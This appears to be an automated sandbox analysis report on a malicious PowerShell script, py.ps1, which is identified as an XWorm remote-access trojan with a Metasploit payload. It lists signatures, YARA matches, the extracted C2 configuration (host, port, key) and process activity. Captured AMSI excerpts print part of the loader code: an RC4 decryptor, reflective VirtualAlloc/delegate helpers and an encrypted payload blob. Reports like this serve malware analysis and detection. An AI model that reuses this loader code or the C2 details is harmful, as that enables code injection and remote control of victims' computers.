Windows Analysis Report
py.ps1

Overview

General Information

Sample name: py.ps1
Analysis ID: 1429326
MD5: b570fa6c00d2478e939db9f5a3217afd
SHA1: 246ea84aa4fabbf26048d8a5bf9e66918971c1a1
SHA256: de367800fbe772f10c52e4dff9a39de73ab08379c19f326680dc677eeba69bbc
Tags: ps1

Detection

Metasploit, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected MetasploitPayload
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Found suspicious powershell code related to unpacking or dynamic code loading
Hijacks the control flow in another process
Loading BitLocker PowerShell Module
Queues an APC in another process (thread injection)
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 1780 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\py.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • notepad.exe (PID: 3300 cmdline: C:\Windows\System32\notepad.exe MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup
Malware Configuration

{"C2 url": ["nmds.duckdns.org"], "Port": "8895", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}

Yara Overview

Memory Dumps

Source: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp; Rule: Windows_Trojan_Donutloader_f40e3759; Description: unknown; Author: unknown; Strings:
  • 0x9aaf:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0xc517:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Source: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp; Rule: Windows_Trojan_Donutloader_5c38878d; Description: unknown; Author: unknown; Strings:
  • 0xa206:$a: 24 48 03 C2 48 89 44 24 28 41 8A 00 84 C0 74 14 33 D2 FF C1
Source: 00000007.00000002.3067644587.000001D114A90000.00000004.08000000.00040000.00000000.sdmp; Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security
Source: 00000007.00000002.3067644587.000001D114A90000.00000004.08000000.00040000.00000000.sdmp; Rule: MALWARE_Win_AsyncRAT; Description: Detects AsyncRAT; Author: ditekSHen; Strings:
  • 0x70b0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x714d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7262:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x6d5c:$cnc4: POST / HTTP/1.1
Source: 00000007.00000002.3067774125.000001D114C51000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security

Unpacked PEs

Source: 7.2.notepad.exe.1d114a90000.0.unpack; Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security
Source: 7.2.notepad.exe.1d114a90000.0.unpack; Rule: MALWARE_Win_AsyncRAT; Description: Detects AsyncRAT; Author: ditekSHen; Strings:
  • 0x52b0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x534d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x5462:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x4f5c:$cnc4: POST / HTTP/1.1
Source: 7.2.notepad.exe.1d114c5cec8.1.unpack; Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security
Source: 7.2.notepad.exe.1d114c5cec8.1.unpack; Rule: MALWARE_Win_AsyncRAT; Description: Detects AsyncRAT; Author: ditekSHen; Strings:
  • 0x52b0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x534d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x5462:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x4f5c:$cnc4: POST / HTTP/1.1
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack; Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security

AMSI

Source: amsi64_1780.amsi.csv; Rule: JoeSecurity_MetasploitPayload_1; Description: Yara detected MetasploitPayload; Author: Joe Security

System Summary

Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\py.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\py.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\py.ps1", ProcessId: 1780, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\py.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\py.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\py.ps1", ProcessId: 1780, ProcessName: powershell.exe
No Snort rule has matched

AV Detection

Source: 00000007.00000002.3067774125.000001D114C51000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: Xworm {"C2 url": ["nmds.duckdns.org"], "Port": "8895", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack; String decryptor: nmds.duckdns.org
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack; String decryptor: 8895
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack; String decryptor: <123456789>
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack; String decryptor: <Xwormmm>
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack; String decryptor: USB.exe

Networking

Source: Malware configuration extractor; URLs: nmds.duckdns.org
Source: powershell.exe, 00000000.00000002.3073247493.0000011C86717000.00000004.00000800.00020000.00000000.sdmp, py.ps1; String found in binary or memory: https://github.com/DARKNOSY/Rush-PowerShell-Obfuscator

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, XLogger.cs; .Net Code: KeyboardLayout
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, XLogger.cs; .Net Code: KeyboardLayout

System Summary

Source: 7.2.notepad.exe.1d114a90000.0.unpack, type: UNPACKEDPE; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.2.notepad.exe.1d114c5cec8.1.unpack, type: UNPACKEDPE; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 00000007.00000002.3067644587.000001D114A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000007.00000002.3067774125.000001D114C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Windows\System32\notepad.exe; Code function: 7_2_000001D112FCAF23
Source: C:\Windows\System32\notepad.exe; Code function: 7_2_000001D112FCAB03
Source: C:\Windows\System32\notepad.exe; Code function: 7_2_000001D112FCB35B
Source: C:\Windows\System32\notepad.exe; Code function: 7_2_000001D112FCB7E3
Source: C:\Windows\System32\notepad.exe; Code function: 7_2_000001D112FC9EDB
Source: 7.2.notepad.exe.1d114a90000.0.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.2.notepad.exe.1d114c5cec8.1.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 00000007.00000002.3067644587.000001D114A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000007.00000002.3067774125.000001D114C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, Helper.cs; Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, Helper.cs; Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, AlgorithmAES.cs; Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, Helper.cs; Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, Helper.cs; Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, AlgorithmAES.cs; Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, ClientSocket.cs; Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, ClientSocket.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, ClientSocket.cs; Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, ClientSocket.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine; Classification label: mal100.troj.spyw.evad.winPS1@4/10@0/0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\notepad.exe; Mutant created: NULL
Source: C:\Windows\System32\notepad.exe; Mutant created: \Sessions\1\BaseNamedObjects\O3B5rRVaa3oX74CD
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qcgvnz3n.01j.ps1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();Set-StrictMode -Version 2$DoIt = @'function Crypt { param ( [byte[]]$key, [byte[]]$data ) $s = 0..255 $j = 0 for ($i = 0; $i -lt 256; $i++) { $j = ($j + $s[$i] + $key[$i % $key.Length]) % 256 $s[$i], $s[$j] = $s[$j], $s[$i] } $i = $j = 0 $output = [byte[]]::new($data.Length) for ($count = 0; $count -lt $data.Length; $count++) { $i = ($i + 1) % 256 $j = ($j + $s[$i]) % 256 $s[$i], $s[$j] = $s[$j], $s[$i] $k = $s[($s[$i] + $s[$j]) % 256] $output[$count] = $data[$count] -bxor $k } $output}function func_get_proc_address{Param($var_module, $var_procedure)$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress',[Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))}function func_get_delegate_type{Param([Parameter(Position = 0, Mandatory = $True)][Type[]] $var_parameters,[Parameter(Position = 1)][Type] $var_return_type = [Void])$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate])$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, 
Managed')$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')return $var_type_builder.CreateType()}[Byte[]]$encryptedData = [System.Convert]::FromBase64String('S2zQef7TSeC39ba951ff8aLEINWPwe4gd9a4D0IvvbJAKTLwScmCXssrU5vuP0I6d8DDIqWLhFUVxXHWNW6xFuvYV8uJMBzIJGXdZPpyhcn+czDuyHLf0WkTCmsH7ynEolA9SwiJ+qNnNXmFg8eJBCYd7S7bAjzXGx6f3OM40JKvgSawCx6PdpB85hZmymkB2R+rWCntVjdk8n5Y7ayQLjnOpY93HT9eOfL7cM7OJ+buySorWzSfrtFw2UplbgFC3dQ9atxsq+pVlN2k/JyfOcp+Rn3MxqkMPv4txECniExP6Qf+PIysijWTfoDX0h2rmsgXAY6a10Ic42t24HmqZUp2/isLFOWpmm4MXha6T6P5+M74LadLqIhwzrtd257hCbaY9AavDrFTcOSQlbqTyhU1akwDAWUfzTBlR12cbkVp83MFLQ6CjJVI6DHDTs1K8funj222WQY30bee88AlDX9lp5hi1a7gqx7O1IZL66xPsCpWnAZ7tEbMFPz0M6vkzAiCssjdmqEEMRAVrlQh9n5JW7XkyxGU4hKDd54ctiTTqrQHVgCgcbrqesooEisvaY/NSQDQvsWi2HBysCk56EytVkaP7QbFTyRA/Y7XrGwtiMIaqQAsQ3xHWSy/hfhNrPrHE286abB+DrBBIQehjdaw6zWw4yl+NzKpOAVPscnelDCSninU8fl/AOL9G5UmAT1Oclgo3n2mVsv97sjIfmzO6+oJCQE1a
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\py.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\notepad.exe C:\Windows\System32\notepad.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\notepad.exe C:\Windows\System32\notepad.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: taskflowdatauser.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ncrypt.dll
Source: C:\Windows\System32\notepad.exe; Section loaded: wininet.dll
Source: C:\Windows\System32\notepad.exe; Section loaded: mscoree.dll
Source: C:\Windows\System32\notepad.exe; Section loaded: amsi.dll
Source: C:\Windows\System32\notepad.exe; Section loaded: wldp.dll
Source: C:\Windows\System32\notepad.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\notepad.exe; Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\notepad.exe; Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\notepad.exe; Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\notepad.exe; Section loaded: wtsapi32.dll
Source: C:\Windows\System32\notepad.exe; Section loaded: winsta.dll
Source: C:\Windows\System32\notepad.exe; Section loaded: cryptsp.dll
Source: C:\Windows\System32\notepad.exe; Section loaded: rsaenh.dll
Source: C:\Windows\System32\notepad.exe; Section loaded: cryptbase.dll
Source: C:\Windows\System32\notepad.exe; Section loaded: userenv.dll
Source: C:\Windows\System32\notepad.exe; Section loaded: profapi.dll
Source: C:\Windows\System32\notepad.exe; Section loaded: sspicli.dll
Source: C:\Windows\System32\notepad.exe; Section loaded: version.dll
Source: C:\Windows\System32\notepad.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: py.ps1; Static file information: File size 13631488 > 1048576

Data Obfuscation

Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, Messages.cs; .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, Messages.cs; .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, Messages.cs; .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, Messages.cs; .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, Messages.cs; .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, Messages.cs; .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, Messages.cs; .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, Messages.cs; .Net Code: Memory System.AppDomain.Load(byte[])
Source: 7.2.notepad.exe.1d114c5cec8.1.raw.unpack, Messages.cs; .Net Code: Memory
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, Messages.cs; .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, Messages.cs; .Net Code: Memory System.AppDomain.Load(byte[])
Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, Messages.cs; .Net Code: Memory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Anti Malware Scan Interface: GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$var_buffer = $var_va.Invoke([IntPtr]::Ze
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('My
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Anti Malware Scan Interface: FromBase64String(@"IyBPYmZ1c2NhdGVkIHVzaW5nIGh0dHBzOi8vZ2l0aHViLmNvbS9EQVJLTk9TWS9SdXNoLVBvd2VyU2hlbGwtT2JmdXNjYXRvciwgbWFkZSBieSBEQVJLTjAkWQoKJGRlY29kZWRTY3JpcHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVV

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
